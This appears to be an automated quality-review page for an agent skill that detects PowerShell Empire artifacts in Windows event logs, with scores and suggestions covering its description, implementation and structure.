analyzing-powershell-empire-artifacts
Detect PowerShell Empire framework artifacts in Windows event logs by identifying Base64 encoded launcher patterns, default user agents, staging URL structures, stager IOCs, and known Empire module signatures in Script Block Logging events.
61
52%
Does it follow best practices?
Impact
Pending
No eval scenarios have been run
Risky
Do not use without reviewing
Optimize this skill with Tessl
npx tessl skill review --optimize ./skills/analyzing-powershell-empire-artifacts/SKILL.mdQuality
Discovery
82%Based on the skill's description, can an agent find and select it at the right time? Clear, specific descriptions lead to better discovery.
This is a strong, highly specific description that clearly communicates the skill's capabilities in detecting PowerShell Empire artifacts. The main weakness is the absence of an explicit 'Use when...' clause, which would help Claude know exactly when to select this skill. The technical specificity and domain focus make it very distinctive.
Suggestions
Add a 'Use when...' clause such as 'Use when analyzing Windows event logs for PowerShell Empire indicators, investigating suspicious PowerShell activity, or performing threat hunting for post-exploitation frameworks.'
| Dimension | Reasoning | Score |
|---|---|---|
Specificity | Lists multiple specific concrete actions: detecting Base64 encoded launcher patterns, default user agents, staging URL structures, stager IOCs, and known Empire module signatures in Script Block Logging events. | 3 / 3 |
Completeness | Clearly answers 'what does this do' with detailed capabilities, but lacks an explicit 'Use when...' clause or equivalent trigger guidance specifying when Claude should select this skill. | 2 / 3 |
Trigger Term Quality | Excellent coverage of natural terms a security analyst would use: 'PowerShell Empire', 'Windows event logs', 'Base64 encoded', 'Script Block Logging', 'IOCs', 'stager', 'launcher patterns', 'user agents'. These are highly specific and natural keywords for this domain. | 3 / 3 |
Distinctiveness Conflict Risk | Extremely specific niche targeting PowerShell Empire framework detection in Windows event logs. This is unlikely to conflict with other skills due to the highly specialized domain and specific artifact types mentioned. | 3 / 3 |
Total | 11 / 12 Passed |
Implementation
22%Reviews the quality of instructions and guidance provided to agents. Good implementation is clear, handles edge cases, and produces reliable results.
This skill reads more like a high-level briefing document than an actionable skill. It identifies the right detection patterns and concepts but completely lacks executable code, concrete examples, step-by-step workflows, or sample outputs. Claude would not be able to reliably perform the described analysis based solely on this content.
Suggestions
Add executable Python code for parsing EVTX files and matching the listed detection patterns (e.g., using python-evtx library to extract Event ID 4104 script blocks and regex-match against Empire indicators).
Define a clear step-by-step workflow: 1) Load/parse EVTX, 2) Extract script blocks, 3) Decode Base64 payloads, 4) Match against IOC patterns, 5) Generate JSON report — with validation at each step.
Provide a concrete example of the expected JSON output schema so Claude knows exactly what to produce.
Remove the generic 'When to Use' section and the explanation of what PowerShell Empire is — replace with actionable content like example log entries and regex patterns.
| Dimension | Reasoning | Score |
|---|---|---|
Conciseness | The overview paragraph explains what PowerShell Empire is, which Claude already knows. The 'When to Use' section is generic boilerplate that adds little value. However, the Key Detection Patterns section is reasonably lean and informative. | 2 / 3 |
Actionability | There is no executable code, no concrete commands, no example queries, no parsing scripts, and no detection rule examples. The skill describes what to look for but never shows how to actually do it — no Python code for parsing EVTX files, no PowerShell queries, no example log entries to match against. | 1 / 3 |
Workflow Clarity | There is no sequenced workflow at all. The skill lists detection patterns and describes a desired output format but never defines the steps to go from raw event logs to the JSON report. No validation checkpoints or error handling are mentioned. | 1 / 3 |
Progressive Disclosure | The content is organized into clear sections with headers, which is good. However, the Output section is vague (describes a JSON report but shows no schema or example), and there are no references to supplementary files for detailed detection rules, example logs, or MITRE mappings. | 2 / 3 |
Total | 6 / 12 Passed |
Validation
90%Checks the skill against the spec for correct structure and formatting. All validation checks must pass before discovery and implementation can be scored.
Validation — 10 / 11 Passed
Validation for skill structure
| Criteria | Description | Result |
|---|---|---|
frontmatter_unknown_keys | Unknown frontmatter key(s) found; consider removing or moving to metadata | Warning |
Total | 10 / 11 Passed | |
- Repository
- mukul975/Anthropic-Cybersecurity-Skills
- Commit
888bbe4
- Reviewed
Table of Contents
Is this your skill?
If you maintain this skill, you can claim it as your own. Once claimed, you can manage eval scenarios, bundle related skills, attach documentation or rules, and ensure cross-agent compatibility.